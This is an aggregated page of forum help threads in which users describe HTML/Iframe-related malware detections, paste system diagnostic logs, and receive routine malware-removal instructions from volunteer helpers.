I am running Windows XP Home Edition SP3 and while clicking on a link trying to find the lyrics to a certain song last night, Avast alerted me to a Virus/Worm. It went through the whole routine of freezing everything up and not being able to close the windows, but eventually I instructed Avast to delete it. I then did a full Avast scan in safe mode and everything was clean except for this one line:Name Of FileC:\Documents and Settings\Sean\Local Settings\Temporary Internet Files\Content.IE5\SEIGLIUM\search[1].htmResultInfection: HTML:Iframe-inf (it could be lframe-inf but I couldn't tell from the readout)Is this anything to worry about? Is it safe to assume that since it was in the Temporary Internet Files folder for IE5 and not in a System folder then it's not that much of a threat? Since I'm running IE7, do I even need any IE5 files? Couldn't I just delete the entire IE5 content folder?Today, I did another half a dozen full scans in safe mode with Malewarebytes' Anti-Malware, SUPERAntiSpyware, Spybot S&D, SpywareBlaster, a-squared, RogueRemover, etc. and they all came up clean. Please advise me of anything else I can do that might help.I am going to run another full Avast scan tonight in safe mode just to be sure that it's completely gone. Also, I notice that when I run Avast in safe mode it says, "Resident Protection: Disabled" - is this normal? It's usually set to either Normal or Custom dependin... Read more

A:Infection: HTML:Iframe-inf

Please print out and follow these instructions: "How to use SDFix". When using this tool, you must use the Administrator's account or an account with "Administrative rights"Disconnect from the Internet and temporarily disable your anti-virus, script blocking and any real time protection programs before performing a scan.When done, the SDFix report log will open in notepad and automatically be saved in the SDFix folder as Report.txt.If SDFix is unable to run after rebooting from Safe Mode, run SDFix in either Mode, and type F, then press Enter for it to finish the final stage and produce the report.Please copy and paste the contents of Report.txt in your next reply.Be sure to renable you anti-virus and and other security programs before connecting to the Internet.-- If the computer has been infected with the VirusAlert! malware warning from the clock and the Start Menu icons or drives are not visible, open the SDFix folder, right-click on either the XP_VirusAlert_Repair.inf or W2K VirusAlert_Repair.inf (depending on your version of Windows) and select Install from the Context menu. Then reboot to apply the changes.

Read other 3 answers
RELEVANCY SCORE 64.8

It would appear that I have this virus, however ESET won't get rid of it. I've run through a full ESET scan and a comboxfix scan to get the logs, but it remains. Here is the comboxfix log (I know I was supposed to wait, but I didn't, so here it is)---Any help you can provide would be much appreciated

ComboFix 12-03-07.05 - jeffrey 03/07/2012 12:02:41.9.4 - x64
Microsoft Windows 7 Home Premium 6.1.7600.0.1252.1.1033.18.3891.1855 [GMT -5:00]
Running from: c:\users\jeffrey\Downloads\ComboFix.exe
AV: ESET NOD32 Antivirus 4.0 *Disabled/Updated* {CB0F8167-5331-BA19-698E-64816B6801A5}
SP: ESET NOD32 Antivirus 4.0 *Disabled/Updated* {706E6083-750B-B597-533E-5FF310EF4B18}
SP: Windows Defender *Enabled/Updated* {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
.
.
((((((((((((((((((((((((( Files Created from 2012-02-07 to 2012-03-07 )))))))))))))))))))))))))))))))
.
.
2012-03-07 17:10 . 2012-03-07 17:10 -------- d-----w- c:\users\Public\AppData\Local\temp
2012-03-07 17:10 . 2012-03-07 17:10 -------- d-----w- c:\users\Default\AppData\Local\temp
2012-03-07 09:05 . 2012-03-07 09:05 69000 ----a-w- c:\programdata\Microsoft\Windows Defender\Definition Updates\{482AB6A2-8D49-42D9-8C76-E616CD14062A}\offreg.dll
2012-03-06 15:36 . 2012-02-08 07:13 8643640 ----a-w- c:\programdata\Microsoft\Windows Defender\Definition Updates\{482AB6A2-8D49-42D9-8C76-E616CD14062A}&... Read more

A:html/iframe.B.Gen virus

Hello, Welcome to BleepingComputer.I'm nasdaq and will be helping you.If you can please print this topic it will make it easier for you to follow the instructions and complete all of the necessary steps.===Your ComboFix log is clean.The type of infection you are seeing could have been incorporated in a all your .htm or. html files.You probably got this type of error message.http://www.wilderssecurity.com/attachment.php?attachmentid=212754&stc=1&d=1254737545Open the file with notepad copy the content and post it here for my review.You should also send the report to ESET for there review.

Read other 2 answers
RELEVANCY SCORE 64.4

Seems nothing I do is enough to get rid of the virus. Formatted ny HDD twice and also reinstalled windows, previously ran both MBAM premium and the trial version of NOD32 but nod32 actually detected every system file as a threat and made my system unstable. So had to reinstall the windows 7 os again. The latest, I refrained from instaling Nod32 anymore and preferred to use their online scanner just to get a report. I would like to recover/disinfect the html files as they are important to me. Any help is appreciated. Unfortunately even my backup drive has been infected too so not much use anymore. Previously I had tried to use the notepad++ program's search and replace tool to get rid of the iframe virus but the fix seemed to be temporary.
 
 
Anyhow here is eset log, thanks

A:HTML/Iframe.B.Gen virus, Virut and more

Hi secretaatoooo,
 
You are infected with Virut, which is a file infecting virus (.exe, .scr, .html). This will take some effort to try and save your HTML files, and it may not even be possible. The problem is that any attempts may corrupt the files, or delete them. Let me see which tools is most effective and I will reply to you.
 
xXToffeeXx~

Read other 7 answers
RELEVANCY SCORE 64.4

I am running windows XP. Avast pops up with a warning that HTML:Iframe-inf malware has been found and recommended action was to Move to chest. I tried to do that and error box pops up that says "The process cannot access the file because it is being used by another process". Cannot process"C\Documents and Settings\Martha\Local Settings\Temporary Internet Files\Content.IE5\QJJFI4H9\client_ad[2].htm''file.I attempted to shutdown all my programs except the Avast warning box; and could not get Yahoo messenger to close. I did the control/alt/delete thing and tried to 'end process' on the yahoo IM.....still did not close. NO amount of clicking on 'end now' did the trick either. I have not shut down and rebooted. My browser if Firefox.....I don't use IE. So, please guide me in removing HTML:Iframe-inf from my computer. Please also bear in mind that I am rather computer illiterate.....confess to be rather duhhhh but am very cautious about going to websites; clicking on links (don't); etc. but perhaps the Mister is not so cautious. I am in a remote location and do not have anyone to help me get rid of this #^%* HTML:Iframe-inf Anybody out there know how to walk a 5 year old through the clean up process of this virus/worm? [smile]

A:HTML:Iframe-inf A VIRUS WAS FOUND!

Schedule a boot time scan - see this linkhttp://www.digitalred.com/avast-boot-time.php

Read other 1 answers
RELEVANCY SCORE 64.4

I can´t seem to get rid of this thing. I doesn´t do any harm, but it is very annoying. Anyone knows how to extinguish it?

Cheers!
 

Read other answers
RELEVANCY SCORE 64.4

Hi,

Is it possible to change the colour of the scrollbar on an IFRAME document or am I stuck with that dull grey. Any ideas?

regards and thks in advance.
K
 

A:HTML: IFRAME scrollbar question

You will have to use CSS - remember that this will only work in Internet Explorer and earlier versions of Opera.

This is an excellent explanation of how to do it:
http://www.b-man.dk/tutorials/css_scrollbarcolour.asp

You will have to apply that style to every page that will be loaded in the iframe. Applying it to the body of the parent page won't work. In other words, if you are using this iframe to load external pages in, it is not possible.
 

Read other 2 answers
RELEVANCY SCORE 64.4

Hello,

Avast (free) often gives me warnings that it has blocked malware from websites - that I have not visited, even when I am not surfing (but, with the Firefox browser on).

I (foolishly I think) was looking for help through Avast -which gave me a phone number to a support company called Yogi. I gave the fellow I talked to access to my puter. After checking my registry, he said that I had infections, but had to pay $186.00 for him to fix it (with a year's support). In hindsight, I think the help number was only a marketing ploy. I just hope they did not add any other programs to hijack my system or keylog my passwords (or other such ploys) when they had access.

In any case, I am hoping that you can help me get rid of what Avast keeps reporting as a HTML:Iframe-inf virus (or malware), that seems to keep trying to take my browser to several different websites (even when I am not surfing).

I hope that I have provided all the info requested below. If not, please just ask for any further info that may be of help. Thank-you very much in advance, for any help that you can offer.

Tech Support Guy System Info Utility version 1.0.0.2
OS Version: Microsoft Windows XP Professional, Service Pack 3, 32 bit
Processor: Intel(R) Pentium(R) 4 CPU 3.00GHz, x86 Family 15 Model 3 Stepping 4
Processor Count: 2
RAM: 2046 Mb
Graphics Card: ASUS AH4650 Series, 1024 Mb
Hard Drives: C: Total - 31580 MB, Free - 20240 MB; D: Total - 30718 MB, Free - 21415 MB; M: Total - 63263 MB, Free - 257... Read more

A:HTML:Iframe-inf malware or virus

Hello again,

Today I had the same problem again. When Avast kept giving me warnings and notifications that it has protected me from going onto malicious websites (even when I wasn't surfing), I pushed "More Info" button on the Avast pop-up, which took me to the Avast webpages that explained more about the infections.

I did this for two Avast warning pop-ups (that tried to take me to two different malicious sites). Below are the URL's to the two Avast webpages that opened, when I clicked the "more info" button on the warning pop-up:

http://www.avast.com/en-ca/lp-secur...llenger2&p_vir=html:Iframe-inf&p_prc=file://C:\Program%20Files\Common%20Files\ComObjects\update.exe&p_obj=http://www.allzoomovies.com/?x=4302&p_var=.%2Ffa%2Fen-ca%2Fvirus-alert-default2&p_pro=0&p_vep=6&p_ves=0&p_lqa=0&p_lsu=24&p_lst=0&p_lex=162&p_lng=en&p_lid=en-ca&p_elm=7&p_vbd=1367
http://www.avast.com/en-ca/lp-secur...llenger2&p_vir=html:Iframe-inf&p_prc=file://C:\Program%20Files\Common%20Files\ComObjects\update.exe&p_obj=http://www.animalsexmania.net/?x=9171.5825.7884.4683&p_var=.%2Ffa%2Fen-ca%2Fvirus-alert-default2&p_pro=0&p_vep=6&p_ves=0&p_lqa=0&p_lsu=24&p_lst=0&p_lex=162&p_lng=en&p_lid=en-ca&p_elm=7&p_vbd=1367

Note that the first hijack or re-direct (or whatever) attempt tried to take my browser to allzoomovies.com,which is in the first (Avast website... Read more

Read other 2 answers
RELEVANCY SCORE 64.4

I ran ESET online scanner becasue my PC was running slow and found the
HTML/Iframe.B.Gen virus.

What are the steps to getting rid of it forever?
 

A:I'm infected with the HTML/Iframe.B.Gen virus - help!

http://speccy.piriform.com/results/pGSzT8aH8JrdO3TzDA5MuSy
 

Read other 1 answers
RELEVANCY SCORE 64.4

Hello,

we have windows 2003 enterprise and now hosted many site on server.

All clients webiste has infected with virus Trojan-clicker.HTML.Iframe.ja and this websites redirct to porn websites.

How to remove this virus? We are running kaspersky to remove it.

Is there any other solution to prevent this problem.

Also let us know how this virus come in?

Thank you
Proasmita
 

A:how to fix Trojan-clicker.HTML.Iframe.ja

Hello

Anybody have an idea about the solution?
Please get back to me...I am in trouble....
Thank you.
 

Read other 1 answers
RELEVANCY SCORE 64.4

I have gotten rid of the file very quickly when my Zone Alarm detected it couldn't repair or fix or quarantine b/c I went into the local setting and got rid of that folder. However Hjt says I may need you to check this logfile for anything else. So let me know and thanks.

Josh

A:Trojan-clicker.html.iframe.iz

Hey, I;m copying my HiJackThis File b/c I was infected with Trojan-clicker virus and want to see if I am have gotten rid of it.Thanks,Josh WLogfile of Trend Micro HijackThis v2.0.2Scan saved at 9:01:44 PM, on 5/26/2008Platform: Windows XP SP2 (WinNT 5.01.2600)MSIE: Internet Explorer v6.00 SP2 (6.00.2900.2180)Boot mode: NormalRunning processes:C:\WINDOWS\System32\smss.exeC:\WINDOWS\system32\winlogon.exeC:\WINDOWS\system32\services.exeC:\WINDOWS\system32\lsass.exeC:\WINDOWS\system32\svchost.exeC:\WINDOWS\System32\svchost.exeC:\WINDOWS\system32\ZoneLabs\vsmon.exeC:\WINDOWS\system32\spoolsv.exeC:\WINDOWS\system32\CTsvcCDA.exeC:\WINDOWS\system32\MsPMSPSv.exeC:\WINDOWS\Explorer.EXEC:\Program Files\Zone Labs\ZoneAlarm\zlclient.exeC:\WINDOWS\system32\spool\drivers\w32x86\3\hpztsb07.exeC:\WINDOWS\system32\hphmon04.exeC:\Program Files\Creative\SBLive\Diagnostics\diagent.exeC:\Program Files\Adobe\Acrobat 7.0\Reader\reader_sl.exeC:\Program Files\Olympus\DeviceDetector\DevDtct2.exeC:\Program Files\Zone Labs\ZoneAlarm\MailFrontier\mantispm.exeC:\WINDOWS\system32\wuauclt.exeC:\Program Files\Trend Micro\HijackThis\HijackThis.exeR0 - ... Read more

Read other 3 answers
RELEVANCY SCORE 64.4

NOD32 keeps telling me I'm infected with Sirefef and HTML/Iframe.B.Gen virus. Can someone please help me clean my computer?

DDS (Ver_2012-11-20.01) - NTFS_AMD64
Internet Explorer: 9.0.8112.16421 BrowserJavaVersion: 10.7.2
Run by Michael at 13:23:47 on 2012-11-30
Microsoft Windows 7 Home Premium 6.1.7601.1.1252.1.1033.18.6135.3421 [GMT -6:00]
.
AV: ESET NOD32 Antivirus 5.2 *Enabled/Outdated* {77DEAFED-8149-104B-25A1-21771CA47CD1}
SP: ESET NOD32 Antivirus 5.2 *Enabled/Outdated* {CCBF4E09-A773-1FC5-1F11-1A056723366C}
SP: Windows Defender *Disabled/Updated* {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
.
============== Running Processes ===============
.
C:\Windows\system32\lsm.exe
C:\Windows\system32\svchost.exe -k DcomLaunch
C:\Windows\system32\nvvsvc.exe
C:\Program Files (x86)\NVIDIA Corporation\3D Vision\nvSCPAPISvr.exe
C:\Windows\system32\svchost.exe -k RPCSS
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted
C:\Windows\system32\svchost.exe -k netsvcs
C:\Program Files (x86)\Creative\Shared Files\CTAudSvc.exe
C:\Windows\system32\svchost.exe -k LocalService
C:\Windows\system32\svchost.exe -k NetworkService
C:\Windows\System32\spoolsv.exe
C:\Program Files\NVIDIA Corporation\Display\nvxdsync.ex... Read more

A:Sirefef and HTML/Iframe.B.Gen Virus

 attach.txt   14.66KB
  5 downloads

Read other 15 answers
RELEVANCY SCORE 64.4

My partner has this trojan on her PC. I've tried a few basic things to get rid of it but no joy. She has Kaspersky V7 installed, it detects the trojan but refuses to delete it. I've attached a Hijackthis.log file.

Thanks in advance,

Ian

Apologies, I have only now found the instructions for posting in this forum. So far I've only posted the HIjackthis log. I will now go and completed the rest of the instructions before reposting

Thanks,
Ian

A:trojan-clicker.html.iframe.jr

Can't figure out how I edited my post last time...

Tried working through the 5 steps. Did 1 okay. Nothing untoward installed.

Got to step 2 and the instructions didn't work. Found my way to Panda, downloaded the activex control, and there is an error message saying "error on page" and IE asking me if it's okay to run the ActiveX control. Click the bar, select run the control and get directed to a sales page. Closed that, back to the original page, warning from IE, click and select run control, sales page again. Went around that loop a few times. Then tried clicking on all hard drives (or something like that) and that started the scan, it's still running, nothing detected so far.

Meanwhile went on to step 3. Skipped that as she already has Kaspersky installed and was unwilling to let me install anything else. If this step is essential please advise and I will revisit this with her.

Step 4 is a bit of a contentious one. She doesn't want to allow MS to update her system as last time I did it on my PC it ended up in the local computer shop, totally useless. The reason was that I had XP Home installed, but somehow, doing only official MS updates, it had magically turned itself into XP Pro, and my license key was no longer valid. I complained to MS but to no avail, they claimed that there was no way Home can turn into Pro just with MS updates. I'm not computer savvy enough to do anything but click OK when MS asks me if I'd like to update my system, but that d... Read more

Read other 2 answers
RELEVANCY SCORE 63.6

I'm infected and need help getting rid of this one! First, I was seeing references to some kind of polycrypt variant, something like win32: poly[something][cryp] or something - I didn't catch the whole name, and I'm not seeing it now. I'm also seeing HTML:Iframe-inf all the time. When I realized I was infected, I ran a full Avast and Malwarebytes scan. I also ran Dr.Web, and all of these found some things.

I don't see the HTML:Iframe-inf infection when using Firefox, but at the time was using IE because the original site I was on (company webmail) would only run in IE. Probably stupid IE is the source of some/all of this.

Now, I'm still having problems. I do know in the course of this (have been working on it for about 3 days, at least 16 hours a day) I've lost some executables, such as Office Tools, for which I no longer have the CD (lost a bunch of stuff during last move.) And, of course, I got sloppy with backups, so no hope there. I just don't want to lose any more!

Can someone here help me, PLEASE? I'm posting a HJT log.

A:HTML:Iframe-inf infection and possible polycrypt variant

Hello and welcome to Bleeping ComputerWe apologize for the delay in responding to your request for help. Here at Bleeping Computer we get overwhelmed at times, and we are trying our best to keep up. Please note that your topic was not intentionally overlooked. Our mission is to help everyone in need, but sometimes it takes just a little longer to get to every request for help.If you have since resolved the original problem you were having, we would appreciate you letting us know. If not please perform the following steps below so we can have a look at the current condition of your machine. If you have not done so, include a clear description of the problems you're having, along with any steps you may have performed so far.Upon completing the steps below another staff member will review and take the steps necessary with you to get your machine back in working order clean and free of malware.If you have already posted a DDS log, please do so again, as your situation may have changed.Use the 'Add Reply' and add the new log to this thread.Thanks and again sorry for the delay.We need to see some information about what is happening in your machine. Please perform the following scan:Download DDS by sUBs from one of the following links. Save it to your desktop.DDS.comDDS.scrDDS.pifDouble click on the DDS icon, allow it to run.A small box will open, with an explaination about the tool. No input is needed, the scan is running.Notepad will open with the results.Follow the instructio... Read more

Read other 2 answers
RELEVANCY SCORE 63.6

Good evening.

My laptop has started playing up today, and after running several scans (using Avast / Combofix / SuperAntiSpyware / Malwarebytes), it's still displaying problems.

Problems include;

HTML:Script-inf (Avast notification when accessing websites, including Facebook)
HTML:Iframe-inf (Avast notification when accessing websites, including Facebook)
HTML:RedirMe-inf[Trj] (Avast notification when accessing websites, including Facebook)
Documents and Settings (Can't access / not sure if I'm supposed to be, shows as password protected)
Each scan is brining up rootkits / trojans and HTML infections (Every HTML file on my laptop was put into quarantine, including websites I've made)

SYSTEM

Tech Support Guy System Info Utility version 1.0.0.1
OS Version: Microsoft Windows 7 Ultimate , 32 bit
Processor: AMD Turion(tm) 64 X2 Mobile Technology TL-60, x64 Family 15 Model 104 Stepping 2
Processor Count: 2
RAM: 2942 Mb
Graphics Card: ATI Radeon X1250, 128 Mb
Hard Drives: C: Total - 189279 MB, Free - 58073 MB;
Motherboard: TOSHIBA, Satellite P300D, Not Applicable , 39057116W
Antivirus: avast! Antivirus, Updated and Enabled

HIJACK

Logfile of Trend Micro HijackThis v2.0.4
Scan saved at 22:30:27, on 11/04/2011
Platform: Windows 7 (WinNT 6.00.3504)
MSIE: Internet Explorer v8.00 (8.00.7600.16385)
Boot mode: Normal

Running processes:
C:\Windows\system32\Dwm.exe
C:\Windows\Explorer.EXE
C:\Windows\system32\taskhost.exe
C:\Windows\System32\rundll32.exe
C:\... Read more

Read other answers
RELEVANCY SCORE 63.6

Hello to all members,

We are running gate automation website. One of our clients called us 3 days back that when he clicked on our website, he gets this error message about html iframe.b.gen virus..I have attached the screenshot for reference.

I have used some online tools to check our website and results show that there are no issues. Also, no one else has called us for this virus attack. So, I am not sure whether this virus is on our website or it is on client's computer.

According to mcafee.com, This threat could be delivered via web pages which were compromised as a result of an SQL injection attack. It may also be received as a result of poor security practices, or un-patched machines and vulnerable systems.

What I have understood from this is..it could be our website or it could be the client's computer..Am I correct?? Can anyone please suggest how can I check if this is an issue on our side or not?? If yes, then how can I resolve this? Thanks

A:A user got Html iframe.b.gen virus on our website

Can anyone please reply to this post?? Thanks

Read other 2 answers
RELEVANCY SCORE 62.8

After removing ZAS and installing NIS2010, all strange things started to happen. Began to receive error 0xc0000142 and 0xc0000042 when trying to either install a program or try cmd or msconfig. NIS2010 SONAR began to quarantine and mostly delete various System32 .exe files. Could not comply with your requested info since the files would not run. Removed NIS2010 with uninstall and Norton removal too, did a restore back to after ZAS was deleted with the ZoneAlarm removal tool, and installed Avast Home for temporary virus protection. After the install, the re-boot started a scan for the elimination of the web32:vitro virus and through the delete process the other three were indicated. Based on the Virut info from Avast, also ran the Virut removal tool without getting any additional deletions. Currently dealing with the Avast for virus, can not operate Windows firewall, using OS Win7 Pro and connected to the broadband modem with a Linksys WRT600N router.DDS (Ver_09-12-01.01) - NTFSx86 Run by Cy at 20:18:29.61 on Sun 01/17/2010Internet Explorer: 8.0.7600.16385 BrowserJavaVersion: 1.6.0_17Microsoft Windows 7 Professional 6.1.7600.0.1252.1.1033.18.2046.1411 [GMT -5:00]SP: SUPERAntiSpyware *disabled* (Updated) {222A897C-5018-402e-943F-7E7AC8560DA7}============== Running Processes ===============C:\Windows\system32\wininit.exeC:\Windows\system32\lsm.exeC:\Windows\system32\svchost.exe -k DcomLaunchC:\Windows\system32\... Read more

A:Web32:vitro; vitrus; mudrop-u; html:Iframe-inf [Trj]

Hello and welcome to Bleeping ComputerWe apologize for the delay in responding to your request for help. Here at Bleeping Computer we get overwhelmed at times, and we are trying our best to keep up. Please note that your topic was not intentionally overlooked. Our mission is to help everyone in need, but sometimes it takes just a little longer to get to every request for help. No one is ignored here.If you have since resolved the original problem you were having, we would appreciate you letting us know. If not please perform the following steps below so we can have a look at the current condition of your machine. If you have not done so, include a clear description of the problems you're having, along with any steps you may have performed so far.Upon completing the steps below another staff member will review and take the steps necessary with you to get your machine back in working order clean and free of malware.If you have already posted a DDS log, please do so again, as your situation may have changed.Use the 'Add Reply' and add the new log to this thread.Thanks and again sorry for the delay.We need to see some information about what is happening in your machine. Please perform the following scan:Download DDS by sUBs from one of the following links. Save it to your desktop.DDS.scrDDS.pifDouble click on the DDS icon, allow it to run.A small box will open, with an explaination about the tool. No input is needed, the scan is running.Notepad will open with the results.Foll... Read more

Read other 3 answers
RELEVANCY SCORE 62.8

EDIT: It seems that I jumped the gun a bit when I originally posted this topic. I've added the DDR.txt and Attach.txt, but whenever I ran gmer it would always crash during the scan, so I was unable to get a log file.Results from DDS.txt:QUOTEDDS (Ver_10-03-17.01) - NTFSx86 Run by ArPee at 16:54:36.99 on Tue 06/15/2010Internet Explorer: 6.0.2900.2180 BrowserJavaVersion: 1.6.0_15Microsoft Windows XP Home Edition 5.1.2600.2.1252.1.1033.18.758.342 [GMT -4:00]AV: AVG Anti-Virus Free *On-access scanning enabled* (Updated) {17DDD097-36FF-435F-9E1B-52D74245D6BF}AV: avast! Antivirus *On-access scanning disabled* (Updated) {7591DB91-41F0-48A3-B128-1A293FD8233D}AV: Norton AntiVirus *On-access scanning disabled* (Outdated) {B5510F6F-87E1-47F7-A411-360BC453007C}============== Running Processes ===============C:\WINDOWS\System32\ibmpmsvc.exeC:\WINDOWS\system32\svchost -k DcomLaunchsvchost.exeC:\WINDOWS\System32\svchost.exe -k netsvcsC:\Program Files\AVG\AVG9\avgchsvx.exeC:\Program Files\AVG\AVG9\avgrsx.exeC:\WINDOWS\system32\S24EvMon.exesvchost.exeC:\Program Files\AVG\AVG9\avgcsrvx.exesvchost.exeC:\WINDOWS\Explorer.EXEC:\Program Files\Common Files\Symantec Shared\ccSetMgr.exeC:\Program Files\Common Files\Symantec Shared\ccEvtMgr.exeC:\Program Files\Lavasoft\Ad-Aware\AAWService.exeC:\... Read more

A:Html:Iframe-HW[Trj],various cookie.Atdmt warnings, and MicrosoftFixIt50123.exe?

Hello and welcome to Bleeping ComputerWe apologize for the delay in responding to your request for help. Here at Bleeping Computer we get overwhelmed at times, and we are trying our best to keep up. Please note that your topic was not intentionally overlooked. Our mission is to help everyone in need, but sometimes it takes just a little longer to get to every request for help. No one is ignored here.If you have since resolved the original problem you were having, we would appreciate you letting us know. If not please perform the following steps below so we can have a look at the current condition of your machine. If you have not done so, include a clear description of the problems you're having, along with any steps you may have performed so far.Upon completing the steps below another staff member will review and take the steps necessary with you to get your machine back in working order clean and free of malware.If you have already posted a DDS log, please do so again, as your situation may have changed.Use the 'Add Reply' and add the new log to this thread.Thanks and again sorry for the delay.We need to see some information about what is happening in your machine. Please perform the following scan:Download DDS by sUBs from one of the following links. Save it to your desktop.DDS.scrDDS.pifDouble click on the DDS icon, allow it to run.A small box will open, with an explaination about the tool. No input is needed, the scan is running.Notepad will open with the results.Foll... Read more

Read other 10 answers
RELEVANCY SCORE 62.4

Bitdefender 2011 reported these rogue processes infected with the following:
-Process: VirtMem Region Dump 0x6240000 + 422000 --- Infected with: Win32.Worm.Nimda.R
-Process: VirtMem Region Dump 0x3fc0000 + 7f000 --- Infected with: Trojan.Clicker.HTML.IFrame.AK

It failed to quarantine the associated executables because by the time I had a chance to do so, these processes were no longer running in my task manager (this I can only assume though).

My last scan was 3 days ago and turned up nothing so this happened within the last 3 days.

I currently also use Zonealarm firewall. Just got a popup message saying my antivirus software is turned off even though Bitdefender's icon tells me otherwise.....sigh.

I'll try and run other online virus scanners a deep scan through BitDefender and a scan in Lavasoft to see what is reported and will post my feedback here.

Anyone else have the same issue and know how to fix this?

Here are my specs:

Tech Support Guy System Info Utility version 1.0.0.1
OS Version: Microsoft® Windows Vista™ Home Premium , Service Pack 2, 32 bit
Processor: AMD Turion(tm) 64 X2 Mobile Technology TL-58, x64 Family 15 Model 104 Stepping 2
Processor Count: 2
RAM: 1789 Mb
Graphics Card: ATI Radeon Xpress 1250, 256 Mb
Hard Drives: C: Total - 71316 MB, Free - 27717 MB; D: Total - 71307 MB, Free - 62838 MB;
Motherboard: Acer, Extensa 5420, Rev , LXE820X00380602B7D2000
Antivirus: Lavasoft Ad-Watch Live! Anti-Virus, Disabled
 

Read other answers
RELEVANCY SCORE 62.4

Trojan.Clicker.HTML.IFrame.AK
Win32.Worm.Nimda.R

I have these two viruses I cannot get rid of with Bitdefender 2010, any antivirus suggestions?
anyone had to deal with these before? Any suggestions?
 

Read other answers
RELEVANCY SCORE 62.4

I thought it usually was websites that infected PCs, but my website has been "hacked" so that it contains malware that my Avast antivirus identies as "HTML:Iframe-inf".Since this has happened twice recently, I was wondering if this problem could come from my PC.The website is www.oack.no. The malware prevents me from doing updates on the database on the website, and I fear other machines might be infected as well when visiting the page. I run Microsoft Vista Home Premium, and my virus protection is Avast! home edition 4.8Here is my DDS-log:DDS (Ver_09-12-01.01) - NTFSx86 Run by sindre at 14:34:49,85 on 14.02.2010Internet Explorer: 8.0.6001.18882Microsoft? Windows Vista™ Home Premium 6.0.6002.2.1252.47.1044.18.2045.834 [GMT 1:00]AV: avast! antivirus 4.8.1296 [VPS 081230-0] *On-access scanning enabled* (Updated) {7591DB91-41F0-48A3-B128-1A293FD8233D}SP: Windows Defender *enabled* (Updated) {D68DDC3A-831F-4FAE-9E44-DA132C1ACF46}SP: avast! antivirus 4.8.1296 [VPS 081230-0] *enabled* (Updated) {7591DB91-41F0-48A3-B128-1A293FD8233D}============== Running Processes ===============C:\Windows\system32\wininit.exeC:\Windows\system32\lsm.exeC:\Windows\system32\svchost.exe -k DcomLaunchC:\Windows\system32\nvvsvc.exeC:\Windows\system32\svchost.exe -k rpcssC:\Windows\System32\svchost.exe -k secsvcsC:\Windows\System32\svchost.exe -k LocalService... Read more

A:My website has twice been affected by "HTML:Iframe-inf" malware. Is this coming from my computer?

Hello and welcome to Bleeping Computer! We apologize for the delay in responding to your request for help. Here at Bleeping Computer we get overwhelmed at times, and we are trying our best to keep up. Please note that your topic was not intentionally overlooked. Our mission is to help everyone in need, but sometimes it takes just a little longer to get to every request for help. No one is ignored here.If you have since resolved the original problem you were having, we would appreciate you letting us know. If not please perform the following steps below so we can have a look at the current condition of your machine. If you have not done so, include a clear description of the problems you're having, along with any steps you may have performed so far.Upon completing the steps below another staff member will review and take the steps necessary with you to get your machine back in working order clean and free of malware.If you have already posted a DDS log, please do so again, as your situation may have changed.Use the 'Add Reply' and add the new log to this thread.Thanks and again sorry for the delay.We need to see some information about what is happening in your machine. Please perform the following scan:Download DDS by sUBs from one of the following links. Save it to your desktop.DDS.scrDDS.pifDouble click on the DDS icon, allow it to run.A small box will open, with an explaination about the tool. No input is needed, the scan is running.Notepad will open with the results.Fo... Read more

Read other 16 answers
RELEVANCY SCORE 61.6

I posted a question a few weeks ago about getting a virus from youtube. Well, I feel like a total dolt considering I ignored Quietmans suggestions about youtube. Actually, I didn't ignore his thoughts, just didn't think anything would happen to me because I hardly look at youtube, but I had a lot of down time, so......
I've been watching a lot of youtube music videos this week, and two days ago I started getting the avast threat detected and stopped, no further action is necessary.
I've been on here long enough to believe further action surely may be necessary, so I ran mbam, sbsd, sas, no infections were found. But I have yet to scan in safe mode. I also use Comodo Firewall and all of these are the free versions.
Before I download all kids of stuff, I must say that I cannot update my os because I accidentally deleted 2 necessary files some time ago. I've tried everything I knew about to try to recover those files but have been unsuccessful.
My thinking is maybe I should just create the system restore discs and just reformat the system and start from scratch? 
What do you think?

Read other answers
RELEVANCY SCORE 61.6

Beginning 3/25 I started receiving virus alerts from Avira AntiVir Personal. Here is the first one:

<< Virus or unwanted program 'HTML/IFrame.DO.54 [virus]'
detected in file 'C:\Documents and Settings\NetworkService\Local Settings\Temporary Internet Files\Content.IE5\EP52U43K\obana[9].htm.
Action performed: Deny access >>

This was also detected in certain other random recent directories under Content.IE5. Some of them appear to be accumulating junk -- css files, jpegs, html files -- from web sites I have never visited.

Please note: I do not use Internet Explorer! I use Firefox. So, there may be some malware downloading junk in the background.

Thank you!

*

.
DDS (Ver_2011-08-26.01) - NTFSx86
Internet Explorer: 8.0.6001.18702
Run by pointdextrous at 15:04:05 on 2012-03-27
Microsoft Windows XP Professional 5.1.2600.3.1252.1.1033.18.2047.1321 [GMT -4:00]
.
AV: AntiVir Desktop *Enabled/Updated* {AD166499-45F9-482A-A743-FDD3350758C7}
.
============== Running Processes ===============
.
C:\WINDOWS\system32\Ati2evxx.exe
C:\WINDOWS\system32\svchost -k DcomLaunch
svchost.exe
C:\WINDOWS\System32\svchost.exe -k netsvcs
C:\Program Files\Intel\Wireless\Bin\EvtEng.exe
C:\Program Files\Intel\Wireless\Bin\S24EvMon.exe
C:\Program Files\Intel\Wireless\Bin\WLKeeper.exe
svchost.exe
C:\Program Files&#... Read more

A:Infected with 'HTML/IFrame.DO.54 [virus]'; IE temp dirs fill with junk

Hello, Welcome to BleepingComputer.I'm nasdaq and will be helping you.If you can please print this topic it will make it easier for you to follow the instructions and complete all of the necessary steps.===Download ATF Cleaner by Atribune from here hereand save it to your Desktop. Follow the instructions for the browser you use.Read the instructions about the cookies. Delete what you do not need.Double click ATF-Cleaner.exe to run the program. Check the boxes to the left of: Windows Temp Current User Temp All Users Temp Temporary Internet Files *Prefetch (Windows XP) only.Java CacheThe rest are optional - if you want to remove the lot, check "Select All". Finally click Empty Selected. When you get the "Done Cleaning" message, click OK. If you use the Firefox or Opera browsers, you can use this program as a quick way to tidy those up as well. When you have finished, click on the Exit button in the Main menu. For Technical Support, double-click the e-mail address located at the bottom of each menu. * The purpose of Prefetch folder is to increase the speed at which you can access the programs that you use on your PC. Unfortunately, Windows doesn't differentiate between a program you use every day and one you use every blue moon, which means that it may be prefetching a lot of stuff that you rarely use, adding to your startup time. You may find that the first time you boot up after cleaning out this folder, your PC takes longer to get into gear - the ... Read more

Read other 4 answers
RELEVANCY SCORE 60.4

